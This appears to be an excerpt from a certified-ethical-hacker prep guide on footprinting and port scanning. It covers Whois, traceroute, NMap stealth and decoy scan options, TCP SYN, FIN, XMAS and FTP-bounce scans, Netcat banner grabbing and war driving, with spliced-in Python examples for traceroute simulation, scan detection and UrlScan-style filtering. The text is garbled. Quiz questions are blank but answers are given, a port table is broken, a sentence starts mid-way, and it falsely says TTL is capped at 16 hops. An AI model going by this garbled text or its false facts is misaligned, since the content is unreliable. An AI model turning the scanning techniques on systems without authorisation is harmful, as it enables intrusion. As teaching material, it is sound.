Footprinting is an important way for an attacker to gain information about an organization passively
(that is, without the organization's knowledge). Footprinting enables the blueprinting of the security
profile of an organization. It involves gathering information about a network to create a profile of the
target's networks and systems.
Footprinting is the first of the three pretest phases of an attack; the other two are scanning and
enumerating. These pretest phases are very important and can make the difference between a
successful and an unsuccessful attack.
Reconnaissance is another term that refers to the process of gathering information about a target
prior to launching an attack.
The EC-Council has divided reconnaissance into a seven-step information-gathering process:
1. Gathering information
2. Determining the network range
3. Identifying active machines
4. Finding open ports and access points
5. Detecting operating systems
6. Fingerprinting services
7. Mapping the network
Footprinting comprises the first two steps in this seven-step process, gathering information and
determining the network range. This chapter discusses these two steps.
Table 4-1: The Seven Steps of the Information-Gathering Process
STEP    TITLE
One     Gathering information
Two     Determining the network range
Three   Identifying active machines
Four    Finding open ports and access points
Five    Detecting operating systems
Six     Fingerprinting services
Seven   Mapping the network
Keep in mind that although these processes are commonly executed in this order, often you may have
to improvise and head in a different direction, depending upon what you find.
Gathering Information
Gathering information means collecting as much knowledge about the target network as possible
before any active scanning takes place. It is considered a passive activity (that is, it does not involve
active encroachment or manipulation of the target's network).
This initial information is collected by compiling information from public sources, either through
running common utilities such as Whois or Nslookup, or manually researching public information
about the target.
This is also referred to as the documentation phase because you're trying to create a document of
information about your target, on which to base your attack.
Whois
Whois is usually the first stop in reconnaissance, supplying information like the target's domain
registrant, its administrative and technical contacts, and a listing of their domain servers. Whois
searches the Internet for domain name administration details, such as domain ownership, address,
location, phone number, and so on, about a specific domain name.
While the Internet Corporation for Assigned Names and Numbers (ICANN) manages the assignment
of domain names and IP addresses, actual domain name registration is offered by competing domain
name registrars. Most registrars also provide DNS hosting service.
Above all of these services are five Regional Internet Registries (RIR) that oversee public IP
addresses within their geographic regions. These are:
American Registry for Internet Numbers (ARIN): North America
RIPE Network Coordination Centre (RIPE NCC): Europe, the Middle East and Central Asia
Asia-Pacific Network Information Centre (APNIC): Asia and the Pacific region
Latin American and Caribbean Internet Address Registry (LACNIC): Latin America and the
Caribbean region
African Network Information Centre (AfriNIC): Africa
Each of these RIRs allows Whois-type searches on their databases to locate information on networks
autonomous system numbers (ASNs), network-related handles, and other related points of contact
(POC).
Figure 4-1 shows part of the RIPE Network Coordination Centre Whois for the BBC.
www.samspade.org
www.allwhois.com
www.geektools.com
www.dnsstuff.com
www.betterwhois.com
www.radb.net
www.internic.net
www.fixedorbit.com
(Whois output excerpt: DNS Servers jws-edcp.wiley.com and ns1.wileypub.com)
Since domain space allocation is deregulated, it's advisable to go to several different Whois servers to
get a complete picture, especially when the hosting service may be offshore.
An excellent third-party Whois tool is SmartWhois by TamoSoft
(www.tamos.com/products/smartwhois). SmartWhois provides comprehensive info about the target's
IP address, host name, or domain, including country, state or province, city, name of the network
provider, administrator, and technical support contact information. SmartWhois can query the
international registries to help find the information about domains located in other parts of the world.
Domain Proxy
A domain proxy allows an organization to display anonymous contact information during a Whois
search. Any communications to the displayed contact information is then forwarded by the proxy
service to the real domain owner. This is intended to help provide a level of protection from
reconnaissance, but still help the organization comply with domain ownership regulations.
Nslookup
Nslookup is a program to query Internet domain name servers. It displays information that can be
used to identify the target's Domain Name System (DNS) infrastructure by querying DNS servers for
machine name and address information. Both the Linux and Windows operating systems come with
an Nslookup client.
Nslookup displays information that can be used to diagnose Domain Name System (DNS)
infrastructure, helps find additional IP addresses, and can identify the MX record to reveal the IP of
the mail server.
To use Nslookup, type nslookup from the command line followed by an IP address or a URL, like:
nslookup www.wiley.com. Typing just nslookup will put you in interactive mode with a > prompt,
whereupon you can enter ? to get a list of options, as shown in Figure 4-2.
(Nslookup output excerpt: www.yahoo-ht2.akadns.net, Address: 209.191.93.52, Aliases: www.yahoo.com)
sender of the datagram, and each router through which a packet passes on the route to its destination
reduces the TTL field by one.
The TTL is limited to 16 hops, which means that after 16 tries, the packet is discarded as
undeliverable. If the TTL reaches 0, the packet is discarded and an Internet Control Message Protocol
(ICMP) message is sent to the originating computer.
The TTL process goes like this:
1. A computer sends out a packet with a TTL of 1.
2. If the first router is not the correct one, it subtracts 1 from the TTL, effectively resetting it to 0,
sends a time exceeded in transit error message to the origin (with its IP address), and the
packet expires.
3. The originating computer increments the TTL by one (TTL + 1) and sends the packet back out,
with the TTL now 2.
4. The first incorrect router subtracts 1 from the TTL again, but since it's now not 0 (it's 1), it
forwards the datagram to the next router.
5. The second router will deliver the packet if it's destined for its network or reset the TTL to 0,
send an error message to the origin, and drop the packet.
6. This process continues until the packet is delivered or until the TTL exceeds 16, at which time
the packet is dropped permanently.
Figure 4-4 shows the concept of routing hops.
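The TTL countdown in the six steps above, as an added example that is not code from the book: a Python simulation of traceroute over an in-memory path, so it runs offline without raw-socket privileges. Router addresses are constructed, the 16-hop cap follows the text, and the silent router is an assumption modelling a firewall that drops the probe without an ICMP reply.

```python
"""How traceroute walks a path with the IP TTL field.

Added example, not code from the book: the routers live in memory and no
packets are sent. The addresses are constructed; the 16-hop limit is the
one stated in the text.
"""
from dataclasses import dataclass

MAX_HOPS = 16  # the hop limit stated in the text


@dataclass
class Router:
    address: str
    silent: bool = False  # True: drops the packet without any ICMP reply


def forward(ttl, path, destination):
    """Carry one probe with the given TTL along the path.

    Every router subtracts one from the TTL. If that makes it 0, the router
    discards the packet and answers the origin with an ICMP "time exceeded in
    transit" message (unless it is silent); otherwise it forwards the packet.
    Returns (address that replied or None, outcome).
    """
    for router in path:
        ttl -= 1
        if ttl == 0:
            if router.silent:
                return None, "dropped without reply"
            return router.address, "time exceeded in transit"
    # Every router forwarded it: the packet reaches the destination network.
    return destination, "delivered"


def traceroute(path, destination, max_hops=MAX_HOPS):
    """Probe with TTL 1, 2, 3, ... until the destination answers or the cap.

    Returns [(ttl, replying address or None), ...]; None is the hop the
    command-line tool prints as '* * *'.
    """
    hops = []
    for ttl in range(1, max_hops + 1):
        replier, outcome = forward(ttl, path, destination)
        hops.append((ttl, replier))
        if outcome == "delivered":
            break
    return hops


def reached_destination(hops, destination):
    """True when the last probe was answered by the destination itself."""
    return bool(hops) and hops[-1][1] == destination


def render(hops):
    """Format the hop list the way the command-line tool prints it."""
    return "\n".join(f"{ttl:2d}  {addr or '* * *'}" for ttl, addr in hops)


# Constructed path: three routers, the middle one a firewall that blocks ICMP.
SAMPLE_PATH = [Router("10.0.0.1"), Router("192.0.2.1", silent=True),
               Router("198.51.100.1")]
SAMPLE_DEST = "203.0.113.10"

if __name__ == "__main__":
    print(render(traceroute(SAMPLE_PATH, SAMPLE_DEST)))
```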
Why TTL?
When each router receives an IP packet, it subtracts one from the TTL field in the packet's header.
When the TTL reaches zero, it's not forwarded any more but is sent back to the originating computer
with a time exceeded in transit ICMP message. TTL is needed to keep the Internet from being
swamped with undeliverable packets, as without TTL, these packets would travel the Internet forever.
Traceroute is useful not only for showing the path the packet takes to the target but also, through the
ICMP messages generated, for showing what routers are used along the way. Traceroute can reveal
the name of routers, the target's DNS entries, the target's network affiliations, and the geographic
location of the routers.
When ICMP is Blocked
It's quite common for firewalls to be configured to block ICMP or UDP and thereby prevent Traceroute
from returning useable information. One program designed to get around this issue is Michael Toren's
TCPTraceroute (http://michael.toren.net/code/tcptraceroute/). TCPTraceroute uses TCP SYN packets
instead of ICMP, and is able to bypass many firewall filters.
If you'd like to run a traceroute program with a little better interface than the command line, several
utilities, free and commercial, may fit the bill. Some are free and some have free demo periods.
NeoTrace (www.neotrace.com) shows you the route between the attacker and the target, including all
intermediate nodes and their registrant information, all in a graphical map. Figure 4-5 shows
NeoTrace mapping a traceroute to Google.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
c. ARTNIC
d. LACNIC
2.
3.
4.
5.
6.
7.
8.
9.
1. Answer: c.
ARTNIC does not exist. The other RIRs listed are: RIPE Network Coordination Centre (RIPE
NCC), African Network Information Centre (AfriNIC), and Latin American and Caribbean Internet
Address Registry (LACNIC).
2. Answer: b
3. Answer: a
4. Answer: a
5. Answer: b
Answer c is correct if the TTL reaches 0, but the router always decrements the TTL by 1 at each
hop.
6. Answer: b
7. Answer: a
8. Answer: c
Linux uses UDP for its Traceroute; Windows uses ICMP.
9. Answer: d
10. Answer: b
11. Answer: d
12. Answer: d
13. Answer: b
Traceroute is used to determine the route between the attacker and the target.
14. Answer: a
15. Answer: c
While the order of steps in information gathering is often varied, Whois is commonly the first step.
16. Answer: a
17. Answer: c
While not impossible, the other three choices are better suited for open searching.
18. Answer: b
19. Answer: a
20. Answer: d
21. Answer: c
Chapter 5: Scanning
Overview
The goal of the scanning phase of pretest reconnaissance is to discover open ports and find
applications vulnerable to hacking. This is done by pinging individual machines, determining the
target's network ranges, and port scanning individual systems. Therefore, the next steps to gathering
information (identifying active machines, discovering open ports and access points, fingerprinting the
operating system, and uncovering services on ports) are parts of the scanning phase.
Although the tester is still in information gathering mode, scanning is more active than footprinting. In
this phase, the tester begins to get a more detailed picture of the target by:
Detecting live machines on the target network
Discovering services running on targeted servers
Identifying which TCP and UDP services are running
Identifying the operating system
Using active and passive fingerprinting
Ping
Before starting the scanning phase, you will need to identify active target machines (that is, find out
which machines are up and running). Ping can be used for this task.
Ping is a useful ICMP utility to measure the speed at which packets are moved across the network,
and to get some basic details about the target, like Time-To-Live (TTL) details. Ping helps in
assessing network traffic by time stamping each packet. It can also be used for resolving host names.
Ping is a very simple utility. It sends an echo request to a target host and then waits for the target to
send an echo reply back. Ping sends out an ICMP Echo Request packet and awaits an ICMP Echo
Reply message from an active machine:
Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127
Reply from 192.168.0.1: bytes=32 time=1ms TTL=127
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127
Ping Sweeps
Since it's often time-consuming and tedious to ping every possible address individually, a technique
known as a ping sweep can be performed that will ping a batch of devices and help the attacker
determine which ones are active. Ping sweeps aid in network mapping by polling network blocks or IP
address ranges rather than individual hosts. Pinged hosts will often reply with an ICMP Echo reply
indicating that they are alive, whereas no response may mean the target is down or nonexistent or
that the ICMP protocol is disabled.
Ping Tools
In addition to the ping utility included with your operating system, there are a variety of ping tools
available. Several vendors offer ping tools that provide various levels of functionality and extra
features, such as ping sweep ability:
WS_PingProPack (www.ipswitch.com)
NetScan Tools (www.nwpsw.com)
Hping (www.hping.org/download.html)
icmpenum (www.nmrc.org)
NMap (described later) can also perform a ping sweep, as shown in the Mode section of Figure 5-1.
Port Scanning
Scanning is a method adopted by administrators and attackers alike to discover more about a
network. Port scanning is the process of connecting to TCP and UDP ports for the purpose of finding
what services and applications are running on the target device. This helps the attacker decide the
best way to attack the system.
The target computer runs many services that listen at well-known ports. Port scanning is one of the
most common reconnaissance techniques used by testers to discover the vulnerabilities in these
services. Port scanning is functionally the process of sending a data packet to a port to gather
information about the state of the port.
A scan may first be implemented using the ping utility. Then, after determining which hosts and
associated ports are active, the attacker can initiate different types of probes on the active ports.
Once you've identified the IP address of a target system through footprinting, you can begin the
process of port scanning: looking for holes in the system through which you, or a malicious intruder,
can gain access. A typical system has 2^16 - 1 port numbers (65,535), each with its own TCP and
UDP port that can be used to gain access if unprotected.
TCP and UDP must use port numbers to communicate with the upper layers. Port numbers are used
to keep track of the different conversations simultaneously crossing the network. Originating source
port numbers dynamically assigned by the source host are usually some number greater than 1,023.
Port scanning makes it possible to find what TCP and UDP ports are in use. For example, if ports 25,
80, and 110 are open, the device is running the SMTP, HTTP, and POP3 services.
An attacker can use port-scanning software to determine which hosts are active and which are
inactive (down) in order to avoid wasting time on inactive hosts. A port scan can gather data about a
single host or several hosts within a subnet (256 adjacent network addresses).
Types of information gathered from scanning include:
Details about the target's Domain Name System (DNS)
What network services are available and running, such as email, FTP, or remote logon on the
target hosts
The type and release version of the operating system running on the target hosts
Ports have three states: open, closed, and filtered:
1. An open port is accepting communications from the target device.
2. A closed port is not accepting connectivity.
3. A filtered port has some type of network device, like a firewall, preventing the port from being
probed to discover whether it's open or closed.
The NMap utility, which we discuss later, has the ability to determine the state of a port.
TCP                   UDP
Sequenced             Unsequenced
Connection-oriented   Connectionless
Reliable              Unreliable
High overhead         Low overhead
Slower                Faster
UDP is almost useless for obtaining scanning information, as opposed to TCP. Since UDP uses best
effort and is focused on speed (which is why it's better than TCP for streaming audio and video), the
hacker can't manipulate a response to generate error messages or avoid detection by an IDS like
TCP. The UDP scan might generate an ICMP unreachable message code, but since ICMP is likely
to be blocked, you'll most often get no response at all.
Manipulation of TCP's three-way handshake is the basis for most TCP-based scanning. As shown in
Figure 5-3, in its basic form, the TCP three-way handshake is broken into the following steps:
1. SYN sent from client
2. SYN/ACK sent from server
3. ACK sent from client
TCP connect() scanning. Connect() is the most basic and fastest-scanning technique.
Connect() is able to scan ports quickly simply by attempting to connect to each port in
succession. The biggest disadvantage for attackers is that it is the easiest to detect and can be
stopped at the firewall.
TCP SYN (half open) scanning. TCP SYN scanning is often referred to as half-open scanning
because, unlike TCP connect(), a full TCP connection is never opened:
1. The scanning machine sends a SYN packet to a target port.
2. If a SYN/ACK is received, it indicates that the port is listening.
3. The scanner breaks the connection by sending an RST (reset) packet.
4. If an RST is received, it indicates that the port is closed.
This is harder to trace because fewer sites log incomplete TCP connections, but some packet-filtering firewalls look for SYNs to restricted ports.
TCP SYN/ACK scanning. TCP SYN/ACK is another way to determine whether ports are open or
closed. The scanner initially sends a SYN/ACK to the target port. If the port is closed, it assumes
the SYN/ACK packet was a mistake and sends an RST. If the port is open, the SYN/ACK packet
will be ignored and the port will drop the packet. This is considered a stealth scan, since it isn't
likely to be logged by the target, but many intrusion detection systems may catch it.
TCP FIN scanning. TCP FIN is a stealth scan that works like the TCP SYN/ACK scan. The
scanner sends a FIN packet to a port. If the port is closed, it replies with an RST. If the port is
open, it ignores the FIN packet. Beware: A Windows machine will send an RST regardless of the
state of the port, so this scan is useful only for identifying listening ports on non-Windows
machines (or for identifying a Windows OS machine).
TCP FTP proxy (bounce attack) scanning. TCP FTP proxy (bounce attack) scanning is a very
stealthy scanning technique. It takes advantage of a weakness in proxy FTP connections. It
works like this:
1. The scanner connects to an FTP server and requests that the server initiate a data
transfer process to a third system.
2. The scanner uses the PORT FTP command to declare that the data transfer process is
listening on the target box at a certain port number.
3. The scanner then uses the LIST FTP command to try to list the current directory. The
result is sent over the server data transfer process channel. If the transfer is successful,
the target host is listening on the specified port. If the transfer is unsuccessful, a 425
Can't build data connection: Connection refused message is sent.
Note
Some FTP servers disable the proxy feature to prevent TCP FTP proxy scanning.
RPC scan. A remote procedure call (RPC) scan is used to locate and identify RPC applications.
After open ports are identified with another scan type, the RPC scan sends each open port an
RPC null to provoke a response from any RPC application that might be running. Figure 5-4
shows an NMap RPC scan.
IDLE scan. Considered the only totally stealth scan, an IDLE scan is a way of scanning a remote
device to gather port information using another station on the network. It will appear that the
scanning process is initiated from this third-party IP address instead of the source host.
XMAS Tree scan. The XMAS tree scan sends a TCP frame to a remote device with the URG,
PUSH, and FIN flags set.
All three of these scans and others are available with the NMap scanning tool.
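The scan types above are distinguished on the wire by the TCP flag combination of an unsolicited inbound segment, which is also how an IDS or firewall log can tell them apart. The following Python is an added example, not code from the CEH Prep Guide or from NMap: it classifies probes by flags (NULL, XMAS, FIN, unsolicited SYN/ACK, SYN) and reports sources that touched many distinct ports. The packet records are constructed; in practice they would come from a firewall or sensor log after connection-tracking has separated unsolicited segments from traffic belonging to known connections.

```python
"""Classify suspicious TCP probes by flag combination and flag probable port scans.

Added example (not from the CEH Prep Guide); the packet records below are constructed.
"""
from collections import defaultdict

# TCP flag bits as laid out in the TCP header flags byte.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_probe(flags: int) -> str:
    """Name the scan type implied by the flags on an unsolicited inbound segment.

    'Unsolicited' means the segment does not belong to a connection the receiver
    initiated or already tracks; that bookkeeping is assumed done by the caller.
    """
    if flags == 0:
        return "NULL"
    if flags == (URG | PSH | FIN):
        return "XMAS"          # URG, PUSH and FIN set, as described in the text
    if flags == FIN:
        return "FIN"
    if flags == (SYN | ACK):
        return "SYN/ACK"       # an unsolicited SYN/ACK is the SYN/ACK scan
    if flags == SYN:
        return "SYN"           # a normal connect() or a half-open SYN scan
    return "other"


def detect_scans(records, port_threshold=10):
    """Group probes by (source IP, scan type) and return only the sources that
    touched at least `port_threshold` distinct destination ports.

    records: iterable of (src_ip, dst_port, flags).
    Returns {(src_ip, scan_type): sorted list of ports}.
    """
    touched = defaultdict(set)
    for src, dport, flags in records:
        kind = classify_probe(flags)
        if kind == "other":
            continue
        touched[(src, kind)].add(dport)
    return {key: sorted(ports) for key, ports in touched.items()
            if len(ports) >= port_threshold}


# Constructed sample: one host sweeping ports with SYN (half-open), another
# with XMAS probes, and a third making two ordinary-looking connections.
SAMPLE = (
    [("10.0.0.5", p, SYN) for p in range(20, 35)]
    + [("10.0.0.9", p, URG | PSH | FIN)
       for p in (21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445)]
    + [("10.0.0.7", 80, SYN), ("10.0.0.7", 443, SYN)]
)

if __name__ == "__main__":
    for (src, kind), ports in detect_scans(SAMPLE).items():
        print(f"{src}: probable {kind} scan of {len(ports)} ports, first {ports[:5]}")
```

The threshold on distinct ports is what separates a scan from a single failed connection; the text's remark that Windows answers a FIN probe with an RST regardless of port state is a reminder that the reply side of these exchanges cannot be used for classification without knowing the target's stack.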
Sometimes a target's operating system details can be found very simply by examining its Telnet
banners or its File Transfer Protocol (FTP) servers, after connecting to these services. We discuss
banner grabbing later.
TCP/IP stack fingerprinting is another technique to identify the particular version of an operating
system. Since OS and device vendors implement TCP/IP differently, these differences can help in
determining the OS. We describe fingerprinting in more detail later.
Another type of OS identification technique is TCP initial sequence number sampling. After a target
responds to a connection request, information about the operating system can be deduced from the
pattern of the sequence numbers in the response.
Scanning Tools
While many of these tools are used by attackers and intruders, they also help the security
administrator detect and stop malicious scans. Used with intrusion detection systems, these tools can
provide some level of protection by identifying vulnerable systems, and they can provide data about
the level of activity directed against a machine or network. Since scanning is a continuous activity
(that is, all networked systems are being scanned all the time), it's very important that the security
professional know what can be compromised. Some common scanning tools are as follows:
HPing is a network analysis tool that sends packets with non-traditional IP stack parameters. It
allows the scanner to gather information from the response packets generated.
Legion will scan for and identify shared folders on scanned systems, allowing the scanner to
map drives directly. It is older software.
Nessus is a free security-auditing tool for Linux, BSD, and a few other platforms. It requires a
back-end server that has to run on a Unix-like platform.
NMap is a very common port-scanning package. More information on NMap follows this section.
The CEH candidate should have hands-on familiarity with this tool.
Security Administrators Integrated Network Tool (SAINT) examines network services, such
as finger, NFS, NIS, FTP and tftp, rexd, statd, and others, to report on potential security flaws.
System Administrator Tool for Analyzing Networks (SATAN) is one of the oldest network
security analyzers. SATAN scans network systems for well-known and often exploited
vulnerabilities.
Tcpview will allow identification of what application opened which port on Windows platforms.
Snort is a utility used for network sniffing. Network sniffing is the process of gathering traffic from
a network by capturing the data as it passes and storing it to analyze later.
SuperScan is a TCP/UDP port scanner, pinger, and hostname resolver. It can perform ping
scans and port scans using a range of IP addresses, or it can scan a single host. It also has the
capability to resolve or reverse-lookup IP addresses.
THC-Amap is a scanning and banner grabbing utility that probes ports to find out what is really
running. It helps to find services that might have been redirected from their standard ports.
Scanrand is a very fast scanning tool. It scans multiple TCP ports at once by implementing
stateless parallel scanning.
Other scanning and cracking tools include Network Security analysis Tool (NSAT), VeteScan, Security
Auditors Research Assistant (SARA), PortScanner, Network Superscanner, CGI Port Scanner, and
CGI Sonar.
The most popular port scanner for Linux, NMap (www.insecure.org/NMap), is also available for the
Windows platform. Considered a required tool for all ethical hackers, NMap can scan a system in a
variety of stealth modes, depending on how undetectable you want to be. NMap can also determine a
lot of information about a target, like what hosts are available, what services are offered, and what OS
is running.
NMap scans for most ports from 1-1024 and a number of others in the registered and undefined
ranges. This helps identify software like PCAnywhere, SubSeven, and BackOrifice. Now that a
Windows interface has been written, it no longer has to be run only on a Unix system.
NMap allows scanning of both TCP and UDP ports, with root privilege required for UDP. While NMap
doesn't have signature or password-cracking capabilities, like L0pht Crack, it will estimate how hard it
will be to hijack an open session.
NMap's Window Scan setting is a very valuable tool for finding open ports and related services, as
shown in Figure 5-5.
NMap is also functional as a command-line utility. To see the list of NMap options, just type NMap from
the command line:
C:\NMap
Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
Vulnerable Ports
There are a total of 65,535 TCP and 65,535 UDP port numbers that the system uses to identify
specific processes communicating with other processes.
Because the complete listing of well-known and registered ports is extensive, some ports are attacked
more often than others. In fact, most attackers will focus on the first 1,024 ports, called the well-known
ports, because most standard services and applications run in this area.
Note
Well-known ports. A good list of well-known ports can be found at
www.iana.org/assignments/port-numbers.
In Table 5-2, we've listed the ports most commonly used and likely to be scanned.
Table 5-2: Commonly Attacked Ports
PORT #              SERVICE NAME    SERVICE DESCRIPTION
21                  ftp
23                  telnet
25, 109, 110, 143
53                  dns
                    http
118                 sqlserv
119                 nntp
161                 snmp
194                 irc
389, 636            ldap
2049                nfs
5631                PCAnywhere
False positives. Some legitimate software uses port numbers registered to other software, which
can cause false alarms when port scanning. This can lead to blocking legitimate programs that
appear to be intrusions.
Heavy traffic. Port scanning can have an adverse effect on WAN links and even effectively
disable slow links. Because heavy port scanning generates a lot of traffic, it is usually preferable
to perform the scanning outside normal business hours.
False negatives. Port scanning can sometimes exhaust resources on the scanning machine,
creating false negatives and not properly identifying vulnerabilities.
System crash. Port scanning has been known to render needed services inoperable or actually
to crash systems. This may happen when systems have not been currently patched or the
scanning process exhausts the targeted system's resources.
Unregistered port numbers. Many port numbers in use are not registered, which complicates
the act of identifying what software is using them.
Banner Grabbing
One of the easiest ways to discover what services are running on the open ports is by banner
grabbing. Banner grabbing also provides important information about what type and version of
software is running. Although most port scanners can perform banner grabbing, banner grabbing can
be performed with just native Telnet or FTP.
If the web server is not properly patched, Telnet can be used to grab HTTP, FTP, and SMTP server
information, using the command syntax: Telnet (IP Address) (Port #).
For example, executing a Telnet banner grab against a Microsoft-IIS/5.0 server creates the following
result:
C:\>telnet 192.168.0.100 80
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 05 Feb Oct 2007 16:04:52 GMT
Content-Type: text/html
Another way to grab banners is to use the free utility Netcat (http://netcat.sourceforge.net/). Distributed
freely under the GNU General Public License (GPL), Netcat has many uses, including banner
grabbing. To grab a banner, execute Netcat from the command line with the syntax:
nc -v -n IP-Address Port
Some of Netcat's features include:
Creating outbound and inbound connections, TCP or UDP, to or from any ports
Providing a tunneling mode which allows special tunneling such as UDP to TCP, with the
possibility of specifying all network parameters (source port/interface, listening port/interface, and
the remote host allowed to connect to the tunnel)
Providing randomized port-scanning
Parsing RFC 854 telnet codes
Microsoft's UrlScan security tool is designed to help restrict the types of HTTP requests that Internet
Information Services (IIS) will process. By blocking specific HTTP requests, the UrlScan security tool
helps prevent potentially harmful requests from reaching the server.
Although UrlScan 2.5 is available on web servers running IIS 4.0 or later, it's not included with IIS 6.0,
because Microsoft feels IIS 6.0 has built-in features that provide security functionality equal to or
better than most of the features of UrlScan 2.5.
Organizations running IIS 6.0 sometimes choose to install UrlScan because they feel that it provides
an added level of security, and some organizations have integrated UrlScan features into their server
management practices for IIS and for other Microsoft servers.
Also, UrlScan has several features that help lessen IIS's vulnerability to banner grabbing
reconnaissance and to other hacking vulnerabilities. These features include:
DenyExtensions. Limits the attack surface of the server by preventing, based on file name
extensions, specific requests from running ISAPI or CGI code on the server
RemoveServerHeader. Removes or alters the identity of the server from the Server response
header
DenyVerbs. Limits the attack surface of the server by preventing requests that would invoke
WebDAV
DenyHeaders. Limits the attack surface of the server by preventing requests that would invoke
WebDAV
RequestLimits. Enforces limits on the size, in bytes, of separate parts of requests reaching the
server
DenyUrlSequences. Allows UrlScan to detect sequences that are used in URL-based attacks on
a web server
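The banner-grabbing section above shows what a Telnet or Netcat session reads off the wire (a status line followed by a Server header), and the UrlScan feature list describes the request filtering and header rewriting that reduce that exposure. The following Python is an added example, not code from the CEH Prep Guide and not Microsoft's UrlScan: it evaluates raw requests against a small policy modelled on the DenyVerbs, DenyExtensions, DenyUrlSequences and RequestLimits features, and strips or replaces the Server header as RemoveServerHeader does (the replacement name is the assumed analogue of UrlScan's AlternateServerName setting). The policy values, the request bytes and the banner are all constructed; the banner is modelled on the IIS 5.0 response shown in the text.

```python
"""Illustrate UrlScan-style request filtering and Server-header removal.

Added example (not from the CEH Prep Guide, not Microsoft's UrlScan code).
Policy values, request bytes and the response banner are constructed.
"""
from urllib.parse import urlsplit

# Constructed policy, loosely modelled on UrlScan.ini defaults; names are illustrative.
POLICY = {
    "deny_verbs": {"PROPFIND", "PROPPATCH", "MKCOL", "SEARCH", "TRACE"},  # WebDAV verbs
    "deny_extensions": {".exe", ".bat", ".cmd", ".com", ".idq", ".htw"},
    "deny_url_sequences": ["..", "./", "\\", ":", "%"],
    "max_url": 260,
    "max_query_string": 2048,
}


def parse_request_line(raw: bytes):
    """Return (verb, target) from the first line of a raw HTTP request."""
    line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    parts = line.split(" ")
    if len(parts) != 3:
        raise ValueError(f"malformed request line: {line!r}")
    return parts[0], parts[1]


def check_request(raw: bytes, policy=POLICY):
    """Return (allowed, reason). Checks run in the order of the feature list:
    verb, file extension, URL sequences, then size limits."""
    verb, target = parse_request_line(raw)
    if verb.upper() in policy["deny_verbs"]:
        return False, f"DenyVerbs: {verb}"
    parts = urlsplit(target)
    path, query = parts.path, parts.query
    last = path.rsplit("/", 1)[-1]
    ext = ("." + last.rsplit(".", 1)[1].lower()) if "." in last else ""
    if ext in policy["deny_extensions"]:
        return False, f"DenyExtensions: {ext}"
    for seq in policy["deny_url_sequences"]:
        if seq in target:
            return False, f"DenyUrlSequences: {seq!r}"
    if len(path) > policy["max_url"]:
        return False, "RequestLimits: MaxUrl"
    if len(query) > policy["max_query_string"]:
        return False, "RequestLimits: MaxQueryString"
    return True, "ok"


def server_header(raw_response: bytes):
    """Extract the Server header value from a raw response (what a banner grab
    reads), or None when the server does not identify itself."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return None


def remove_server_header(raw_response: bytes, alternate=None) -> bytes:
    """Drop the Server header (RemoveServerHeader) or, when `alternate` is
    given, replace its value so the banner no longer names the real software."""
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    kept = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"server:"):
            if alternate is not None:
                kept.append(b"Server: " + alternate.encode("latin-1"))
            continue
        kept.append(line)
    return b"\r\n".join(kept) + sep + body


# Constructed banner, modelled on the IIS 5.0 response shown in the text.
BANNER = (b"HTTP/1.1 400 Bad Request\r\n"
          b"Server: Microsoft-IIS/5.0\r\n"
          b"Date: Mon, 05 Feb 2007 16:04:52 GMT\r\n"
          b"Content-Type: text/html\r\n\r\n")

if __name__ == "__main__":
    print(check_request(b"PROPFIND / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"))
    print(server_header(BANNER), "->", server_header(remove_server_header(BANNER)))
```

Removing the Server header only hides the banner; the stack-level differences described under fingerprinting remain visible, which is why the text treats header removal as a reduction of reconnaissance value rather than a fix.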
What is WebDAV?
WebDAV stands for Web-based Distributed Authoring and Versioning. It is a set of extensions to the
HTTP protocol that allows users to edit and manage files collaboratively on remote web servers.
War Dialing
Since modems have very weak authentication and often proliferate unchecked throughout an
organization, they can present a readily available back door into the network for an attacker and aid in
discovering running services.
War dialing is the term given to accessing a network by using a modem and software to scan for
target systems with attached modems. Information about these modems can then be used to attempt
external unauthorized access. War dialers automatically test every phone line in an exchange to try to
locate modems that are attached to the network.
A war dialer is a tool used to scan a large pool of telephone numbers to try to detect vulnerable
modems for providing access to a system. The program may search for dial tones by randomly dialing
numbers within a specific bank of numbers or by looking for a modem or fax connection.
The most common war dialer tools are:
THC-Scan. DOS application that dials ranges of numbers to search for a modem or fax
ToneLoc. A program that dials from a file of area codes and number banks
PhoneSweep. A heavy-duty war dialing application that supports simultaneous multiple phone
lines
War walking refers to the same process, but using shoe leather instead of transport, commonly in
public areas such as malls, hotels, or city streets.
The concept of war driving is simple: Using a device capable of receiving an 802.11b signal, a device
capable of locating itself on a map, and software that will log data the moment a network is detected,
the hacker moves from place to place, letting these devices do their jobs. Over time, the hacker builds
up a database comprising the network name, signal strength, location, and IP/namespace in use.
Via SNMP, the hacker may even log packet samples and probe the access point for available data.
The hacker may also mark the location of the vulnerable wireless network with chalk on the sidewalk
or building itself. This is called war chalking and alerts other intruders that an exposed WLAN is
nearby.
Common war driving exploits find many wireless networks with WEP disabled and with only the SSID
for access control. As noted earlier, the SSID for wireless networks can be found quickly. This
vulnerability makes these networks susceptible to what's called the parking lot attack, where, at a safe
distance from the building's perimeter, an attacker gains access to the target network.
